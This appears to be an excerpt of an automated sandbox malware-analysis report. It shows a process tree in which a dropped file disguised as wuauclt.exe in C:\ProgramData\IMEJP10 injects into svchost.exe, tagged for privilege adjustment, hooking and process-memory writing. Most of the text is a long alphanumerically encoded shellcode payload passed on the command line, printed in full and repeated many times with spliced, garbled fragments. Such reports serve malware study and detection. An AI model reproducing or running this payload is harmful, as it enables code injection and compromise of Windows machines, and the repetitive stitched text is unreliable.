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 [500] PC@
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2080
- - C:\Windows\SysWOW64\svchost.exe
    C:\Windows\SysWOW64\svchost.exe netsvcs 2080
    3⤵
    PID:1232

C:\ProgramData\IMEJP10\wuauclt.exe
C:\ProgramData\IMEJP10\wuauclt.exe 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 [100] PC@
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5024
- C:\ProgramData\IMEJP10\wuauclt.exe
  C:\ProgramData\IMEJP10\wuauclt.exe LLLLYIIII7QZAkA0D2A00A0kA0D2A12B10B1ABjAX8A1uIN2uNkXlMQJLePvbUPePJgW59t7kwOKDSPJgg5hh2ZezxFVXJg75xlrebuXbtKyWqUXp5FKfZvYPKwpEzTm7xosdLUO7w5zXLnN0dVNKO72eKLYKJs3ROEucKypdnkgEVP5PgpUPLKRVtLLKT6ELLKw6WxlKQnwPLKp6u6vYPOr8RUzRnkyHlKRs7LNkpTvzt8wsxSlIqEYLlK1bQ0wsZSNkSzFxVSjrk9aEkhcfrqLKsen8NmQmXdlMulNwwCJrkLnM5SO3rrpVvSZrNkxpVSiPKLnLlDKpptEWKqYR334rN0XkHtLKyRQNBzgK370t7t72xbklJlNkw5klLK3xuteSxKQvNkTTRqnkG8wlESjkNks4J1wsISk9VgKN75JxOpsMxX7vpYaNqnlkPj60lK9MnazKGpUQUPGpbsQzEPKOpUKTOuO0tOk4nQWpePUPlKzUmQJNePeQgpwpGsl0KMNLrFUmQL303DURzK8wKLiWSvfbQsbORN1vhG2fUVaySWfNcTKwpF4J3QPtuPWpBJc0PhMPwpwp7pazUSsZuPSZS1PhWpUP7pMPpSioSeKXNczXKOsDPlLKJxSZ7pPSkO65JTMYQUxLSZw0SX30VpS0S02p1zgpYoSel8neKpOy0ExPPtpMpj7pnmF5iDf2ioSEXLv0qCKOv5XlLE9PT4ekbskOse8pLKcezpNkPMxLmQYTuPURePuPlKM5QMP3iKsyRqmZuJP0Wl7zXbkKbyTsKkcsK0KKKORUUT5cKkZKzVvP5LvjXbJQnmK2tStL7pePF0crkOKbySAN2unkZLk1jLGpdBWpwpo73uKTWkwOIdU0iWW5kX0z5zjfTxO7rexlsu2uM2TKxGbejP5Fn6HVyPXG1Ul4M7XoRtZ5yW2ezXNNxP4VlkO73uilYKhSSR856SHIsTnkgE6PGpUPUPLKPvtLNkafWllKr